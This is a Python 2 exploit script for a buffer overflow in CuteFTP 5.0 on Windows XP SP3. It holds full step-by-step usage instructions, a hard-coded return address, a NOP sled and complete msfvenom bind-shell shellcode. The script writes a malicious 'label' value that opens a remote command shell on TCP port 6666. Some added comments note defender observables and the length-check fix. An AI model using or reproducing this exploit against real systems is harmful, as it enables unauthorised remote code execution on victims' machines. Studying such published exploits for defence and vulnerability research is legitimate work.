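# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Professional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
#    the exploit file into the 'label' field and provide a dummy IP address.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
#
# NOTE: Python 2 script (print statements; str literals are byte strings).

# Return address: little-endian encoding of 0x7C91FCD8, which the author
# attributes to ntdll.dll on the tested XP SP3 build. The value is hard-coded,
# so it is only meaningful where that module is loaded at the same base;
# a platform that randomises module bases (ASLR) would invalidate it.
ret = "\xD8\xFC\x91\x7C"  # ntdll.dll 7C91FCD8

# 30 single-byte NOPs (0x90) placed between the return address and the shellcode.
nops = '\x90' * 30

# Author's generation command, kept for reference:
# msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
# The payload is a TCP bind shell on port 6666 with \x0a, \x00 and \x0d
# excluded as bad characters. Observable result for defenders: a listener on
# TCP 6666 owned by the process started from the CuteFTP shortcut.
sc = ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"

# Layout: 520 filler bytes, the 4-byte return address, the NOPs, the
# shellcode, then 'C' padding. The padding term keeps the total length at
# 520 + 4 + 30 + 3572 = 4126 bytes for any shellcode of up to 3572 bytes.
# NOTE(review): 520 is presumably the distance from the start of the buffer
# that receives the Site Manager 'label' field to the saved return address;
# this file does not show how it was measured. The application-side fix for
# this class of bug is a length check on that field before it is copied.
buffer = "A" * 520 + ret + nops + sc + "C" * (3572 - len(sc))

payload = buffer
try:
    # The context manager closes the handle even if write() raises.
    with open("exploit.txt", "w") as f:
        print "[+] Creating %s recreational bytes..." % len(payload)
        f.write(payload)
    print "[+] File created!"
except (IOError, OSError):
    # Only I/O failures are reported with this message; the original bare
    # except also swallowed KeyboardInterrupt and programming errors.
    print "File cannot be created"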